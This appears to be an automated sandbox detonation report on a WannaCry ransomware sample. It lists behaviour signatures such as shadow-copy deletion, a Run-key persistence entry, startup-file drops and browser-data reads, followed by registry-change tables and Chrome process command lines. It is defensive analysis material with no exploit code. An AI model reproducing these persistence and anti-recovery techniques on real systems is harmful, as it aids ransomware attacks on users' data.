Analysis Overview
Threat Level: Known bad
The file http://adds was found to be: Known bad.
Malicious Activity Summary
Wannacry
Deletes shadow copies
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Drops startup file
Loads dropped DLL
Reads user/profile data of web browsers
Modifies file permissions
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Drops file in System32 directory
Enumerates physical storage devices
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Interacts with shadow copies
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-01 17:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 17:40
Reported
2024-06-01 18:14
Platform
win10-20240404-en
Max time kernel
1980s
Max time network
1969s
Command Line
Signatures
Wannacry
Deletes shadow copies
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDD8FE.tmp | C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDD8F7.tmp | C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\grgzzewzdng210 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\icuin.dll | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\icuuc.dll | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected] | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133617372944218692" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Windows\system32\notepad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\system32\notepad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents" | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Windows\system32\notepad.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\notepad.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Windows\system32\notepad.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "6" | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Windows\system32\notepad.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Windows\system32\notepad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\system32\notepad.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | C:\Windows\system32\notepad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg | C:\Windows\system32\notepad.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "51200" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected] | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://adds
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff887b89758,0x7ff887b89768,0x7ff887b89778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1504 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1972 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2656 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2684 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3752 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2680 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4412 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4084 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3548 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=1628 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3304 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3788 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3812 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
